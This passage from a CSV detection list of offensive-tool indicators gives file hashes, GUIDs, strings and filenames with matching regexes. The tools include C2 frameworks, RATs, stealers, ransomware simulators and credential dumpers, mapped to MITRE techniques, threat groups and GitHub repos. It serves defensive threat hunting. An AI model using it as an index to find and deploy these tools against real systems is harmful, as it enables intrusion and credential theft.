"*cf615f0091a045903318a5c1d3c7eb37d337c26ceb3b682a3b68fc820913bac6*",".{0,1000}cf615f0091a045903318a5c1d3c7eb37d337c26ceb3b682a3b68fc820913bac6.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","38065"
"*cf649763c47c27458c5af325697d002c0768efb7b45e5a0246d529519df56ea4*",".{0,1000}cf649763c47c27458c5af325697d002c0768efb7b45e5a0246d529519df56ea4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","38066"
"*cf78b329b4dcb1c211415309e2ddbf80833ad1669fd142a67c916aa6a8cecb88*",".{0,1000}cf78b329b4dcb1c211415309e2ddbf80833ad1669fd142a67c916aa6a8cecb88.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","#filehash","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","38068"
"*cf840440b78deadaf6f4f085db860d3bc69ce480edc505a378f733127ff37bc6*",".{0,1000}cf840440b78deadaf6f4f085db860d3bc69ce480edc505a378f733127ff37bc6.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","38070"
"*CF8C386C-46B2-4F40-BCB1-774C01E72B1C*",".{0,1000}CF8C386C\-46B2\-4F40\-BCB1\-774C01E72B1C.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","38074"
"*cf9093662998386beaec51633ada8314d43b63904a3eb51e0a9096586b25ee95*",".{0,1000}cf9093662998386beaec51633ada8314d43b63904a3eb51e0a9096586b25ee95.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38075"
"*CF924967-0AEC-43B2-B891-D67B6DB9F523*",".{0,1000}CF924967\-0AEC\-43B2\-B891\-D67B6DB9F523.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","0","#GUIDproject","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","38076"
"*cf9e538aaea081090e945093f69919d1a76c34f0200ffb1a61684273bf43eba4*",".{0,1000}cf9e538aaea081090e945093f69919d1a76c34f0200ffb1a61684273bf43eba4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","38077"
"*cf9fb0b8e718dfebc8dfb4d5a9be9e57a00994fd060c250187ed92957b69fd15*",".{0,1000}cf9fb0b8e718dfebc8dfb4d5a9be9e57a00994fd060c250187ed92957b69fd15.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","38078"
"*cfa25f5e4321a86b2c4f646a63345fb6ac46a7089886354ad82653a47e55be51*",".{0,1000}cfa25f5e4321a86b2c4f646a63345fb6ac46a7089886354ad82653a47e55be51.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","38079"
"*cfa67ee856362f2ee50affde932411c76eaa74329a59141b6c5c0ccbf65031c8*",".{0,1000}cfa67ee856362f2ee50affde932411c76eaa74329a59141b6c5c0ccbf65031c8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","38081"
"*cfaeab5ed1fab3145ab6bd8ceeafa35b7d7b10851f949d6c20fde81d8b4d4782*",".{0,1000}cfaeab5ed1fab3145ab6bd8ceeafa35b7d7b10851f949d6c20fde81d8b4d4782.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","38083"
"*cfafc9b2d6cbc65769074bab296c5fbacc676d298f7391a3ff787307eb1cbce0*",".{0,1000}cfafc9b2d6cbc65769074bab296c5fbacc676d298f7391a3ff787307eb1cbce0.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","38084"
"*cfalta/PoshADCS*",".{0,1000}cfalta\/PoshADCS.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","38085"
"*cfc253a8282a4065ff78c11a6495632991b2651e12203dbbb11bdb21bc2cb74f*",".{0,1000}cfc253a8282a4065ff78c11a6495632991b2651e12203dbbb11bdb21bc2cb74f.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","38088"
"*cfcaca43f0d9b496ee8d45d9382492994b9c120a5d1cb0e51c23528a8ca4c171*",".{0,1000}cfcaca43f0d9b496ee8d45d9382492994b9c120a5d1cb0e51c23528a8ca4c171.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","38090"
"*cfcad25ab252fbff7fc8a7bbac67915dfce5f76b5738f894fa13afbd5d60a5de*",".{0,1000}cfcad25ab252fbff7fc8a7bbac67915dfce5f76b5738f894fa13afbd5d60a5de.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","38091"
"*cfcbf020d9a94c9ae6f255c3888bff4159e6521803ed993d64430ffc3c62e9be*",".{0,1000}cfcbf020d9a94c9ae6f255c3888bff4159e6521803ed993d64430ffc3c62e9be.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","38092"
"*cfcdad4c34f652853a157b3f5bf9f8748b5f74963ca41f32632bbd755c250882*",".{0,1000}cfcdad4c34f652853a157b3f5bf9f8748b5f74963ca41f32632bbd755c250882.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38094"
"*cfcf2478b9522b54a9af162dacde8a1b7618f808eb711ab6c1a44191bb044f31*",".{0,1000}cfcf2478b9522b54a9af162dacde8a1b7618f808eb711ab6c1a44191bb044f31.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","38096"
"*cfd8565cb10640aa0710735a30291d6edb24f6a99af3704eb6bf1a016e83564f*",".{0,1000}cfd8565cb10640aa0710735a30291d6edb24f6a99af3704eb6bf1a016e83564f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38097"
"*cfe2a0ee87618dc322a1f96521df4e51a5a81ba1d7e713e73ce8d3d0e9b712d0*",".{0,1000}cfe2a0ee87618dc322a1f96521df4e51a5a81ba1d7e713e73ce8d3d0e9b712d0.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","38099"
"*cfe69a909f43c5734f180e5d0583d8f56d8f7a6cf87c36d43625d3bfa786e7ca*",".{0,1000}cfe69a909f43c5734f180e5d0583d8f56d8f7a6cf87c36d43625d3bfa786e7ca.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","38101"
"*CFE81801-C2C5-4444-BE67-64EFFEFDCD73*",".{0,1000}CFE81801\-C2C5\-4444\-BE67\-64EFFEFDCD73.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","38102"
"*cfed546b7f1d9d3e030bbb3f412c93b77672da5f5b6a513c7bd54328ca483387*",".{0,1000}cfed546b7f1d9d3e030bbb3f412c93b77672da5f5b6a513c7bd54328ca483387.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","38103"
"*cfed7067c52715989de828850551ceb0e92a5f1f5389a81a025424a88ab77e50*",".{0,1000}cfed7067c52715989de828850551ceb0e92a5f1f5389a81a025424a88ab77e50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","38104"
"*cff5798485f1f260bed03c9f82572288df0dfd169fe1e448708d229fa8112ac8*",".{0,1000}cff5798485f1f260bed03c9f82572288df0dfd169fe1e448708d229fa8112ac8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38105"
"*cff5970b451b7b79d26b9d3aed274bec25920d0c6131ee22a3320dade7675498*",".{0,1000}cff5970b451b7b79d26b9d3aed274bec25920d0c6131ee22a3320dade7675498.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","38106"
"*cff8cdb2c3e117ad109d77b14d9449a9da9c9141a8b208a54479584d6e5389b6*",".{0,1000}cff8cdb2c3e117ad109d77b14d9449a9da9c9141a8b208a54479584d6e5389b6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","38107"
"*cfprefsd_race_condition*",".{0,1000}cfprefsd_race_condition.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38109"
"*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*",".{0,1000}cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","38110"
"*cgeeodpfagjceefieflmdfphplkenlfk*",".{0,1000}cgeeodpfagjceefieflmdfphplkenlfk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","38111"
"*cGlpLmZkYS5nb3Y=*",".{0,1000}cGlpLmZkYS5nb3Y\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","38112"
"*cGlwZW5hbWU9*",".{0,1000}cGlwZW5hbWU9.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38113"
"*ch0sys/DUBrute*",".{0,1000}ch0sys\/DUBrute.{0,1000}","offensive_tool_keyword","DUBrute","RDP  Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","38115"
"*CH3CK70K3N(*",".{0,1000}CH3CK70K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","38116"
"*Chachi-Enumerator.ps1*",".{0,1000}Chachi\-Enumerator\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","38117"
"*ChaitanyaHaritash/kimi*",".{0,1000}ChaitanyaHaritash\/kimi.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","38120"
"*chameleon.py *",".{0,1000}chameleon\.py\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38121"
"*change_sandbox_evasion_method(*",".{0,1000}change_sandbox_evasion_method\(.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","38122"
"*change_sandbox_evasion_method(*",".{0,1000}change_sandbox_evasion_method\(.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","38123"
"*change_shellcode_exec_method(*",".{0,1000}change_shellcode_exec_method\(.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","38124"
"*changepasswd.py*",".{0,1000}changepasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38125"
"*change-windows10-mac-address.py*",".{0,1000}change\-windows10\-mac\-address\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","38126"
"*Changing NTLM credentials of current logon session *",".{0,1000}Changing\sNTLM\scredentials\sof\scurrent\slogon\ssession\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","38127"
"*Changing NTLM credentials of logon session *",".{0,1000}Changing\sNTLM\scredentials\sof\slogon\ssession\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","38128"
